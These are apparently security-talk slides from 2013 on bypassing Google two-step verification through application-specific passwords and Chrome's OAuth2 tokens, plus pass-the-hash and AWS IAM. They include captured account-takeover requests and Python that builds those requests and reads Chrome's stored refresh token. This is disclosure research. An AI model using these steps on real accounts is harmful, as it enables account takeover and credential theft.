Security exploits of Google application specific passwords & Chrome’s OAuth2 tokens
Bypassing Strong Authentication... With Passwords?!
Adam Goodman, [email protected] - 2013-07-31
duosecurity.com
0. Kill The Password?
1. Bypassing Google’s 2-Factor Authentication
Google’s 2-Step Verification
What About Non-Web-Based Logins?
Thick-Client Protocols
‣ IMAP
‣ CalDAV
‣ XMPP
‣ ...
Google Software (Interim Solution)
‣ Android
‣ Chrome
Application-Specific Passwords
‣ 16 lowercase letters
‣ Randomly-Generated by Google
‣ Individually Revokable
‣ Not intended to be memorized
sounds a bit like...
ASPs vs. OAuth Tokens
‣ ASPs have to be generated manually
‣ ASPs aren’t actually Application-Specific!
Not-So-Application-Specific
“Another weakness of ASP is the misimpression that it provides application-limited rather than full-scope account access.”
- Authentication at Scale, appearing in IEEE S&P Magazine vol. 11, no. 1
Detour: Android Auto-Login
Also:
‣ Chromebooks
‣ Desktop versions of Chrome (if enabled in chrome://flags)
‣ ...?
Detour: Android Auto-Login
Worked even for the most sensitive parts of https://accounts.google.com:
‣ 2FA settings: https://accounts.google.com/b/0/SmsAuthConfig?hl=en
‣ Account-Recovery Settings: https://accounts.google.com/b/0/UpdateAccountRecoveryOptions?hl=en&service=oz
So...
‣ ASPs can link an Android device, and
‣ With auto-login, Android devices could - with no additional authentication - take over your account completely!
Let’s Figure Out How This Works...
Android HTTPS Interception, v1
‣ Real Device (Google Nexus S) with a custom default gateway
‣ Linux Desktop, running sslsniff
  http://www.thoughtcrime.org/software/sslsniff/
‣ Custom CA certificate
Let’s Figure Out How This Works...
Android HTTPS Interception, v2
‣ Android Emulator
  $ emulator -http-proxy localhost:8080 @avd_name
‣ Burp Suite Proxy
  http://portswigger.net/burp/
‣ Custom CA certificate
Basic Workflow
‣ POST to https://android.clients.google.com/auth
  Send Email, EncryptedPasswd, service=ac2dm
  Receive “Token”
‣ POST to https://android.clients.google.com/auth
  Send Email, Token, service=urlquote(“weblogin:continue=https://accounts.google.com/ManageAccount”)
  Receive “MergeSession” URL
‣ Open the MergeSession URL; get instantly logged into your account!
Step 1
POST /auth HTTP/1.1
Host: android.clients.google.com
...

accountType=HOSTED_OR_GOOGLE&Email=akgood%40arbsec.org&has_permission=1&add_account=1&EncryptedPasswd=AFcb4...&service=ac2dm&source=android&androidId=3281f33679ccc6c6&device_country=us&operatorCountry=us&lang=en&sdk_version=17
Step 1
HTTP/1.1 200 OK
...

SID=DQAAANwAAAVMG4uYt2HaF...
Auth=DQAAAOAAAACRbLC5-dgM...
services=goanna_mobile,apps,[email protected]
Token=1/fXrv8D3fLP1mOBj3o1...
GooglePlusUpgrade=1
firstName=Adam
lastName=Goodman
Step 1: EncryptedPasswd?
POST /auth HTTP/1.1
Host: android.clients.google.com
...

accountType=HOSTED_OR_GOOGLE&Email=akgood%40arbsec.org&has_permission=1&add_account=1&Passwd=xxxxxxxxxxxxxxxx&service=ac2dm&source=android&androidId=3281f33679ccc6c6&device_country=us&operatorCountry=us&lang=en&sdk_version=17
Step 2
POST /auth HTTP/1.1
Host: android.clients.google.com
...

accountType=HOSTED_OR_GOOGLE&Email=akgood%40arbsec.org&has_permission=1&Token=1%2FfXrv8D3fLP1mOBj3o1...&service=weblogin%3Acontinue%3Dhttps%253A%252F%252Faccounts.google.com%252FManageAccount&source=android&androidId=3281f33679ccc6c6&app=com.android.browser&client_sig=61ed377e85d386a8dfee6b864bd85b0bfaa5af81&device_country=us&operatorCountry=us&lang=en&sdk_version=17
Step 2
HTTP/1.1 200 OK
...

Auth=https://accounts.google.com/MergeSession?args=continue%3Dhttps%253A%252F%252Faccounts.google.com%252FManageAccount&uberauth=AP...&source=AndroidWebLogin
Expiry=0
Simplified Workflow
‣ POST to https://android.clients.google.com/auth
  Send Email, Passwd, service=urlquote(“weblogin:continue=https://accounts.google.com/ManageAccount”)
‣ Receive “MergeSession” URL
Go from Application-Specific Password to full account takeover with one API call!
Timeline
‣ 2012/07/16: Duo researchers confirm presence of ASP weakness.
‣ 2012/07/18: Issue reported to [email protected].
‣ 2012/07/20: Communication with Google Security Team clarifying the issue.
‣ 2012/07/24: Issue is confirmed and deemed “expected behavior” by Google Security Team.
‣ 2013/02/21: Fix is pushed by Google to prevent ASP-initiated sessions from accessing sensitive account interfaces.
‣ 2013/02/25: Public disclosure by Duo.
Google’s Fix
‣ Sensitive account-settings pages are no longer accessible via auto-login (you must enter username/password/OTP)
‣ ~Nothing else has changed
Multiple Discovery
‣ http://grkvlt.blogspot.co.uk/2012/08/google-tfa-security-issue.html
‣ http://connect.ncircle.com/ncircle/attachments/ncircle/VERTBlog/173/1/CraigYoung_BSidesSlides-2SV.pdf
Evaluation
2-step Verification Still Helps...
‣ Phishing
‣ Password-sharing between services (with insecure password databases)
... But ASPs Can Be Stolen
HTTPS Man-In-The-Middle
‣ Thick-client applications are notoriously bad at checking SSL certificates:
  https://crypto.stanford.edu/~dabo/pubs/abstracts/ssl-client-bugs.html
Malware can grab stored passwords...
‣ Windows: Data Protection API
  Encrypts data using a key derived from the user’s logon credential
  Any process running under the same user account can decrypt any DPAPI-protected data (unless the application mixed in its own optional entropy)
‣ OS X: Keychain
  Stronger: per-application permissions
‣ Plaintext...
Case Study: Pidgin
‣ Plain-Text Passwords!
  https://developer.pidgin.im/wiki/PlainTextPasswords
‣ GTalk / “Hangouts” - (probably) low impact if compromised
  If we were storing a credential that only had access to your GTalk account, then storing it in plaintext might be ~OK
‣ GMail - (probably) high impact if compromised
  ... all of your other accounts on the internet?!
Not Just Application-Specific Passwords
‣ Chrome on Windows / Mac / Linux has the same “auto-login” functionality
‣ ... but it’s using OAuth2 now!
Workflow
‣ POST to https://accounts.google.com/o/oauth2/token
  send refresh_token, client_id, client_secret (the latter two are hardcoded into Chrome)
  receive access_token
‣ GET to https://accounts.google.com/OAuthLogin?source=ChromiumBrowser&issueuberauth=1
  send access_token in Authorization header
  get “uberauth” token back
‣ Use “uberauth” token to construct a MergeSession URL
How Is The Refresh Token Stored?
from (e.g.) ~/Library/Application Support/Google/Chrome/Default/Preferences:
...
"oauth2LoginRefreshToken": {
  "status": "Successful",
  "value": "1/0209_TGZzDyfxwozFV..."
}
...
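The two exchanges above (the Android /auth flow on slides 22-28 and Chrome's refresh_token / uberauth flow on slides 37-38) share one shape: a credential sitting in a client-side store, a token exchanged for an uberauth, and a MergeSession URL whose continue target is one URL-encoding layer down. The following is an added example, not Duo's code and not Google's: it encodes and decodes those messages offline against constructed samples, so the double encoding visible on slide 26 and the refresh-token location on slide 38 become explicit. The Bearer scheme for the OAuthLogin header, the placeholder client_id/client_secret, and every token value are assumptions; the real client credentials compiled into Chrome are not reproduced, and nothing is sent over the network.

```python
"""Offline encoder/decoder for the two token-to-session exchanges the slides
capture: the Android /auth flow (slides 22-28) and Chrome's OAuth2 flow
(slides 37-38). Added by the editor as an illustration; not Duo's code and
no network I/O. All tokens below are constructed placeholders."""
import json
from typing import Optional
from urllib.parse import parse_qs, quote, urlencode, urlsplit

AUTH_URL = "https://android.clients.google.com/auth"
TOKEN_URL = "https://accounts.google.com/o/oauth2/token"
OAUTHLOGIN_URL = ("https://accounts.google.com/OAuthLogin"
                  "?source=ChromiumBrowser&issueuberauth=1")
MANAGE_ACCOUNT = "https://accounts.google.com/ManageAccount"


def weblogin_service(continue_url: str) -> str:
    """service=weblogin:continue=<url>. The URL is quoted once here; the form
    encoding in build_auth_body() quotes the whole value again, which is why
    the slide-26 capture reads %253A%252F%252F (a double-encoded ://)."""
    return "weblogin:continue=" + quote(continue_url, safe="")


def build_auth_body(email: str, service: str, *, passwd: Optional[str] = None,
                    token: Optional[str] = None,
                    android_id: str = "3281f33679ccc6c6") -> str:
    """Form body for POST /auth. Exactly one of passwd (slides 25/28; an
    application-specific password works here) or token (slide 26) is sent."""
    if (passwd is None) == (token is None):
        raise ValueError("send exactly one of passwd or token")
    fields = {"accountType": "HOSTED_OR_GOOGLE", "Email": email, "has_permission": "1"}
    if passwd is not None:
        fields.update(add_account="1", Passwd=passwd)
    else:
        fields["Token"] = token
    fields.update(service=service, source="android", androidId=android_id,
                  device_country="us", operatorCountry="us", lang="en", sdk_version="17")
    return urlencode(fields)  # quote_plus: ':' -> %3A, '/' -> %2F, '%' -> %25


def parse_kv_response(body: str) -> dict:
    """ClientLogin-style response: one key=value per line (slides 24 and 27)."""
    out = {}
    for line in body.splitlines():
        key, sep, value = line.partition("=")
        if sep:
            out[key.strip()] = value.strip()
    return out


def merge_session_params(url: str) -> dict:
    """Decode the MergeSession URL from the Auth= line (slide 27): the continue=
    target sits inside args=, one more URL-encoding layer down."""
    query = parse_qs(urlsplit(url).query)
    args = parse_qs(query["args"][0])
    return {"continue": args["continue"][0],
            "uberauth": query["uberauth"][0],
            "source": query.get("source", [""])[0]}


def chrome_refresh_token(preferences_json: str) -> Optional[str]:
    """oauth2LoginRefreshToken.value from Chrome's Preferences file (slide 38);
    None if the entry is missing or not marked Successful."""
    entry = json.loads(preferences_json).get("oauth2LoginRefreshToken") or {}
    return entry.get("value") if entry.get("status") == "Successful" else None


def build_refresh_body(refresh_token: str, client_id: str, client_secret: str) -> str:
    """Body for POST /o/oauth2/token (slide 37). grant_type=refresh_token is the
    standard OAuth2 field (RFC 6749 section 6); client_id/client_secret stand in
    for the values compiled into Chrome, which the slide does not reproduce."""
    return urlencode({"grant_type": "refresh_token", "refresh_token": refresh_token,
                      "client_id": client_id, "client_secret": client_secret})


def oauthlogin_headers(access_token: str) -> dict:
    """Authorization header for GET OAuthLogin (slide 37). The slide only says the
    access_token goes in the Authorization header; Bearer is an assumption."""
    return {"Authorization": "Bearer " + access_token}


# Constructed sample data, shaped like the redacted slide captures (not real tokens).
SAMPLE_STEP2_RESPONSE = (
    "Auth=https://accounts.google.com/MergeSession?args=continue%3Dhttps%253A%252F%252F"
    "accounts.google.com%252FManageAccount&uberauth=APexample&source=AndroidWebLogin\n"
    "Expiry=0\n")
SAMPLE_PREFERENCES = json.dumps({"oauth2LoginRefreshToken": {
    "status": "Successful", "value": "1/EXAMPLE_REFRESH_TOKEN"}})

if __name__ == "__main__":
    print(build_auth_body("akgood@arbsec.org", weblogin_service(MANAGE_ACCOUNT), token="1/fXrv..."))
    print(merge_session_params(parse_kv_response(SAMPLE_STEP2_RESPONSE)["Auth"]))
    print(chrome_refresh_token(SAMPLE_PREFERENCES))
```

Run it and compare the first printed body with the slide-26 capture: the only differences are the redacted token value and the absent app/client_sig fields. The refresh-token reader is the whole point of slide 38: the file is ordinary user-readable JSON, so the same-user-process threat from slide 34 applies unchanged.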
OAuth2 Won’t (automagically) Save You
Unexpected threat models:
‣ Access to your tabs/bookmarks/history/etc. vs. access to your entire Google account!
2. Passing The Hash In Windows Networks... Even When Passwords Are “Disabled”
(borrowing in part from http://www.foofus.net/~hinge/presos/insidious-implicit-windows-trust-relationships.pdf)
Local vs Domain Logins
‣ Local
  Password hashes are stored on your workstation
‣ Domain
  Password hashes stored on the Domain Controller
  Your workstation will cache them, sometimes
‣ Both Local and Domain accounts can be administrators on your workstation
[Diagram: several Workstations, an Other Server and a Domain Controller]
Authentication In Windows Networks
‣ NTLM Authentication
‣ Kerberos
‣ ...
NTLM Authentication
‣ Challenge-response protocol
‣ Uses the NTLM hash of the user’s password, not the password itself!
  One-way hash function (MD4 over the UTF-16LE password)
  No salting, no PBKDF2 ...
‣ Extremely pervasive in Windows ecosystems
  RPCs
  SMB mounts
  ...
Pass-The-Hash
NTLM Authentication only requires the NTLM Hash!
‣ Gain local admin rights on a single workstation (somehow...)
‣ Extract NTLM Hashes
‣ Use them to compromise other machines in the network!
[Diagram: hashes taken from one Workstation reused against other Workstations, an Other Server and the Domain Controller]
What About Smart-Cards?
Public/Private Key-pair and Certificate stored on cryptographic hardware
‣ Private Key can “never” be extracted
‣ Authenticate by asking the smartcard to digitally sign a value (basically, challenge-response)
‣ Windows can do Certificate-based user authentication
Sounds much better, right?
What About Smart-Cards?
“In order to support NTLM authentication [MS-NLMP] for applications connecting to network services that do not support Kerberos authentication, when PKCA is used, the KDC returns the user's NTLM one-way function (OWF) in the privilege attribute certificate (PAC) PAC_CREDENTIAL_INFO buffer ([MS-PAC] section 2.6.1).”
- [MS-PKCA]: Public Key Cryptography for Initial Authentication (PKINIT) in Kerberos Protocol http://msdn.microsoft.com/en-us/library/cc238455.aspx
Evaluation
Smart-cards still can help...
‣ Weak Passwords
‣ Shared Passwords between accounts / systems
But Pass-The-Hash attacks can still be a threat!
3. Some Conclusions
Real-world ecosystems tend to have multiple, distinct authentication scenarios...
... passwords (or similar stored-secret authentication methods) are likely to continue to exist in some scenarios ...
... in each scenario, we must carefully balance privileges with trust
Authentication Scenarios and Trust
Rights
‣ What is the maximum set of permissions that should be granted to a user?
Integrity Level
‣ How strongly has a user / client authenticated?
4. Amazon Web Services: Identity and Access Management (IAM)
Identity And Access Management (IAM)
‣ A single AWS account can have multiple users
‣ Flexible Rights-Expression Language, based on:
  Resources (e.g. EC2 Instances, DNS zones, ...)
  Actions (e.g. start instance, stop instance, ...)
  Other session context (e.g. client IP address, SSL usage, whether 2FA was used, ...)
IAM Policy Example
{
  "Version": "2012-10-17",
  "Statement": [{
    "Action": ["ec2:StopInstances", "ec2:TerminateInstances"],
    "Effect": "Deny",
    "Resource": ["*"],
    "Condition": {
      "Null": {"aws:MultiFactorAuthAge": "true"}
    }
  }]
}
Deny specific actions if a user didn’t use 2-factor authentication (the Null condition matches when aws:MultiFactorAuthAge is absent from the request context, i.e. the credentials in use were not obtained with MFA)
2-Factor Authentication for API Clients
AWS Security Token Service (STS)
‣ Provide API credentials and a one-time-passcode to a specific endpoint
‣ Get a new set of temporary credentials back
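The policy on slide 53 and the STS flow on slide 54 fit together: GetSessionToken with an OTP issues temporary credentials whose requests carry aws:MultiFactorAuthAge, and the Null condition denies the listed actions whenever that key is missing. The toy evaluator below is an added example (the editor's, not the AWS policy engine and not Duo's code) that replays the slide's statement, plus a constructed companion Allow, against two constructed request contexts; it handles only the Null operator and wildcard action matching, ignores Resource and NotAction, so use the IAM policy simulator for real policies.

```python
"""Toy evaluator for the Null condition the slide-53 policy uses, with request
contexts standing in for long-term access keys and for STS temporary credentials
obtained with an MFA code (slide 54). Added by the editor as an illustration; it
is not the AWS policy engine and ignores most of IAM (Resource matching,
NotAction, other condition operators)."""
import fnmatch

# The deny-only statement from slide 53 (with the Statement key quoted).
SLIDE_POLICY = {
    "Version": "2012-10-17",
    "Statement": [{
        "Action": ["ec2:StopInstances", "ec2:TerminateInstances"],
        "Effect": "Deny",
        "Resource": ["*"],
        "Condition": {"Null": {"aws:MultiFactorAuthAge": "true"}},
    }],
}

# Constructed companion Allow so the demo has something for the Deny to override.
DEMO_POLICY = {
    "Version": "2012-10-17",
    "Statement": [{"Action": "ec2:*", "Effect": "Allow", "Resource": "*"}]
    + SLIDE_POLICY["Statement"],
}

# Constructed request contexts. aws:MultiFactorAuthAge is only populated when the
# caller's credentials were issued with MFA (e.g. STS GetSessionToken + OTP).
CTX_LONG_TERM_KEYS = {"aws:SourceIp": "203.0.113.10", "aws:SecureTransport": "true"}
CTX_STS_WITH_MFA = dict(CTX_LONG_TERM_KEYS, **{"aws:MultiFactorAuthAge": "300"})


def _as_list(value):
    return value if isinstance(value, list) else [value]


def _null_condition(keys: dict, context: dict) -> bool:
    """"Null": {key: "true"} matches when key is ABSENT from the request context;
    "false" matches when it is present. Every listed key must match."""
    for key, want_absent in keys.items():
        absent = key not in context
        if absent != (want_absent.lower() == "true"):
            return False
    return True


def statement_matches(stmt: dict, action: str, context: dict) -> bool:
    """Action match (case-insensitive, '*' wildcards) plus all conditions."""
    patterns = [p.lower() for p in _as_list(stmt["Action"])]
    if not any(fnmatch.fnmatchcase(action.lower(), p) for p in patterns):
        return False
    for operator, keys in stmt.get("Condition", {}).items():
        if operator == "Null":
            if not _null_condition(keys, context):
                return False
        else:
            raise NotImplementedError(f"toy evaluator does not handle {operator}")
    return True


def evaluate(policy: dict, action: str, context: dict) -> str:
    """IAM decision order: an explicit Deny wins, then Allow, else implicit deny."""
    matched = [s for s in policy["Statement"] if statement_matches(s, action, context)]
    if any(s["Effect"] == "Deny" for s in matched):
        return "Deny"
    if any(s["Effect"] == "Allow" for s in matched):
        return "Allow"
    return "ImplicitDeny"


if __name__ == "__main__":
    for ctx_name, ctx in (("long-term keys", CTX_LONG_TERM_KEYS), ("STS + MFA", CTX_STS_WITH_MFA)):
        for action in ("ec2:DescribeInstances", "ec2:TerminateInstances", "s3:GetObject"):
            print(f"{ctx_name:15} {action:25} {evaluate(DEMO_POLICY, action, ctx)}")
```

The output table is the slide's "Evaluation" point in miniature: the same access key is allowed to describe instances and denied to terminate them until the caller trades it, plus an OTP, for STS credentials. Nothing denies s3:GetObject here; it is simply never allowed, which is the implicit-deny default the companion Allow had to be written to overcome.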
Evaluation
AWS gives you all the tools to build strong, flexible authorization policies...
... but you have to actually build them!
AWS is intended for developers (and other savvy types)
Questions?